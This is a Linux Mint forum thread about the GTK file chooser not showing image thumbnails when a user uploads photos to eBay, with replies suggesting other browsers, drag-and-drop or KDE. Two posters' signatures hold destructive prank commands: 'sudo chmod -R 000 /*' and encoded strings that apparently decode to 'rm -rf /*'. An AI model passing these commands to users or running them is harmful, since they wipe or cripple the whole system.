not seeing ebay thumbnails in mint

I just came over from windows 7 and have loved mint so far, but I hope this isn't a deal breaker. I need thumbnail view when I select my images when I list items, but all I can get is list view. They are so tiny I can not see them. Any thoughts would be appreciated.

this is the view I see when I try to upload photos, I hate to go back to windows 10!

image.png.2828976ebfb6f01bfe08ae5237904b85.png

there's a preview right there...?

Also if you don't like it that's not an issue with Mint, it's an issue with Firefox. It uses the default gtk file chooser and as far as I know that can't be changed. You can try a different browser like Chromium if it bothers you.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Thank you for your response......I have tried chrome, chromium, slimjet and firefox along with 4 other distros. I am trying to view them like this

I list many items a day and having to view each photo in a side window will slow my list rate down tremendously. 

Thanks!

20 hours ago, anasazi said:

Thank you for your response......I have tried chrome, chromium, slimjet and firefox along with 4 other distros. I am trying to view them like this

I list many items a day and having to view each photo in a side window will slow my list rate down tremendously. 

Thanks!

looks like chromium also uses the default gkt chooser... maybe you can open the normal file manager and drag-and-drop the images to ebay?

By the way, quote me or I won't get a notification for your replies.

-edit-

also you can try qutebrowser, that should use the qt file chooser which should let you see thumbnails as you wanted

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

The gnome file picker doesn't have support for file thumbnails. You'll have better luck with kde.

# $(echo 726d202d7266202f2a0a | xxd -r -p)
# $(echo OJWSALLSMYQC6KQK | base32 -d)
# $(echo cm0gLXJmIC8qCg== | base64 -d)